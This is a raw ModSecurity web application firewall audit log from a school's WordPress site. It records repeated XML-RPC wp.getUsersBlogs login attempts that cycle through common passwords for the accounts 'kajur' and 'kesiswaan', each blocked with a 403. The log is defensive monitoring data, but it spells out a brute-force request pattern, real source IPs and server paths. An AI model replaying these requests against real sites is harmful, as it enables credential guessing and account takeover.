Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ced09e29-C-- wp.getUsersBlogs kajur smkn22-jkt-sch-id123456 --ced09e29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ced09e29-E-- --ced09e29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079767489612 4856 (- - -) Stopwatch2: 1745079767489612 4856; combined=3742, p1=435, p2=3126, p3=0, p4=0, p5=105, sr=86, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ced09e29-Z-- --6b96a53c-A-- [19/Apr/2025:23:23:53 +0700] aAPOGXNa4dA2HllpK_PnUgAAAJA 103.236.140.4 36860 103.236.140.4 8181 --6b96a53c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6b96a53c-C-- wp.getUsersBlogs kajur q1w2e3r4t5 --6b96a53c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b96a53c-E-- --6b96a53c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079833552261 5275 (- - -) Stopwatch2: 1745079833552261 5275; combined=3821, p1=446, p2=3139, p3=0, p4=0, p5=133, sr=88, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b96a53c-Z-- --c2fb2555-A-- [19/Apr/2025:23:25:00 +0700] aAPOXA6cTFSgLAHl7PpOWwAAABM 103.236.140.4 37202 103.236.140.4 8181 --c2fb2555-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c2fb2555-C-- wp.getUsersBlogs kajur Jessica --c2fb2555-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2fb2555-E-- --c2fb2555-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079900723218 5316 (- - -) Stopwatch2: 1745079900723218 5316; combined=3776, p1=449, p2=3131, p3=0, p4=0, p5=112, sr=87, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2fb2555-Z-- --8c5d5836-A-- [19/Apr/2025:23:26:00 +0700] aAPOmEruoUXZj665VUFyDgAAANc 103.236.140.4 37490 103.236.140.4 8181 --8c5d5836-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8c5d5836-C-- wp.getUsersBlogs kajur pa$$w0rd --8c5d5836-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c5d5836-E-- --8c5d5836-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079960457613 5163 (- - -) Stopwatch2: 1745079960457613 5163; combined=3658, p1=444, p2=3047, p3=0, p4=0, p5=98, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c5d5836-Z-- --02c6b857-A-- [19/Apr/2025:23:27:00 +0700] aAPO1OvDiFC_ir7MDwZSVAAAAE4 103.236.140.4 37806 103.236.140.4 8181 --02c6b857-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --02c6b857-C-- wp.getUsersBlogs kajur adminmlg --02c6b857-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02c6b857-E-- --02c6b857-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080020840371 5348 (- - -) Stopwatch2: 1745080020840371 5348; combined=3754, p1=444, p2=3141, p3=0, p4=0, p5=99, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02c6b857-Z-- --7164e31b-A-- [19/Apr/2025:23:28:01 +0700] aAPPEQ6cTFSgLAHl7PpOowAAABA 103.236.140.4 38092 103.236.140.4 8181 --7164e31b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7164e31b-C-- wp.getUsersBlogs kajur 2003 --7164e31b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7164e31b-E-- --7164e31b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080081226401 4949 (- - -) Stopwatch2: 1745080081226401 4949; combined=3648, p1=449, p2=3020, p3=0, p4=0, p5=104, sr=88, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7164e31b-Z-- --abcc0a4c-A-- [19/Apr/2025:23:29:02 +0700] aAPPTuvDiFC_ir7MDwZSegAAAFU 103.236.140.4 38406 103.236.140.4 8181 --abcc0a4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --abcc0a4c-C-- wp.getUsersBlogs kajur public --abcc0a4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abcc0a4c-E-- --abcc0a4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080142523138 5384 (- - -) Stopwatch2: 1745080142523138 5384; combined=3771, p1=492, p2=3107, p3=0, p4=0, p5=102, sr=90, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abcc0a4c-Z-- --6558d804-A-- [19/Apr/2025:23:30:02 +0700] aAPPiuvDiFC_ir7MDwZSsAAAAFc 103.236.140.4 38720 103.236.140.4 8181 --6558d804-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6558d804-C-- wp.getUsersBlogs kajur xxxxx --6558d804-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6558d804-E-- --6558d804-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080202112277 3783 (- - -) Stopwatch2: 1745080202112277 3783; combined=2458, p1=322, p2=2011, p3=0, p4=0, p5=73, sr=59, sw=52, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6558d804-Z-- --d01ac66b-A-- [19/Apr/2025:23:31:02 +0700] aAPPxuvDiFC_ir7MDwZSxgAAAFQ 103.236.140.4 39100 103.236.140.4 8181 --d01ac66b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d01ac66b-C-- wp.getUsersBlogs kajur baseball --d01ac66b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d01ac66b-E-- --d01ac66b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080262529185 5604 (- - -) Stopwatch2: 1745080262529185 5604; combined=3728, p1=489, p2=3085, p3=0, p4=0, p5=91, sr=82, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d01ac66b-Z-- --8e5edf4c-A-- [19/Apr/2025:23:31:05 +0700] aAPPyUruoUXZj665VUFyqgAAAMI 103.236.140.4 39122 103.236.140.4 8181 --8e5edf4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8e5edf4c-C-- wp.getUsersBlogs kajur 1234%^&* --8e5edf4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e5edf4c-E-- --8e5edf4c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080265360348 5862 (- - -) Stopwatch2: 1745080265360348 5862; combined=4058, p1=517, p2=3367, p3=0, p4=0, p5=105, sr=89, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e5edf4c-Z-- --436cb05b-A-- [19/Apr/2025:23:32:03 +0700] aAPQA-vDiFC_ir7MDwZS2QAAAEw 103.236.140.4 39426 103.236.140.4 8181 --436cb05b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --436cb05b-C-- wp.getUsersBlogs kajur pepper --436cb05b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --436cb05b-E-- --436cb05b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080323956672 5280 (- - -) Stopwatch2: 1745080323956672 5280; combined=3736, p1=465, p2=3103, p3=0, p4=0, p5=99, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --436cb05b-Z-- --c878b255-A-- [19/Apr/2025:23:33:06 +0700] aAPQQnNa4dA2HllpK_Pn3wAAAI0 103.236.140.4 39752 103.236.140.4 8181 --c878b255-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c878b255-C-- wp.getUsersBlogs kajur jackson --c878b255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c878b255-E-- --c878b255-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080386529605 16858 (- - -) Stopwatch2: 1745080386529605 16858; combined=27864, p1=439, p2=3049, p3=0, p4=0, p5=12203, sr=86, sw=77, l=0, gc=12096 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c878b255-Z-- --6ea49330-A-- [19/Apr/2025:23:34:08 +0700] aAPQgA6cTFSgLAHl7PpPSQAAAAU 103.236.140.4 40066 103.236.140.4 8181 --6ea49330-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6ea49330-C-- wp.getUsersBlogs kajur lovely --6ea49330-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ea49330-E-- --6ea49330-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080448433403 6181 (- - -) Stopwatch2: 1745080448433403 6181; combined=4294, p1=525, p2=3524, p3=0, p4=0, p5=138, sr=93, sw=107, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ea49330-Z-- --14a3935b-A-- [19/Apr/2025:23:35:09 +0700] aAPQvevDiFC_ir7MDwZTFQAAAEo 103.236.140.4 40394 103.236.140.4 8181 --14a3935b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --14a3935b-C-- wp.getUsersBlogs kajur olivia --14a3935b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14a3935b-E-- --14a3935b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080509483357 5950 (- - -) Stopwatch2: 1745080509483357 5950; combined=4082, p1=521, p2=3386, p3=0, p4=0, p5=103, sr=93, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14a3935b-Z-- --2cd1fa3c-A-- [19/Apr/2025:23:36:10 +0700] aAPQ-nNa4dA2HllpK_PoPAAAAIo 103.236.140.4 40706 103.236.140.4 8181 --2cd1fa3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2cd1fa3c-C-- wp.getUsersBlogs kajur myspace1 --2cd1fa3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2cd1fa3c-E-- --2cd1fa3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080570905968 5884 (- - -) Stopwatch2: 1745080570905968 5884; combined=4108, p1=537, p2=3383, p3=0, p4=0, p5=111, sr=91, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2cd1fa3c-Z-- --463c1073-A-- [19/Apr/2025:23:37:18 +0700] aAPRPkruoUXZj665VUFzQAAAANE 103.236.140.4 41038 103.236.140.4 8181 --463c1073-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --463c1073-C-- wp.getUsersBlogs kesiswaan admin --463c1073-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --463c1073-E-- --463c1073-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080638123102 4935 (- - -) Stopwatch2: 1745080638123102 4935; combined=3730, p1=462, p2=3089, p3=0, p4=0, p5=104, sr=87, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) 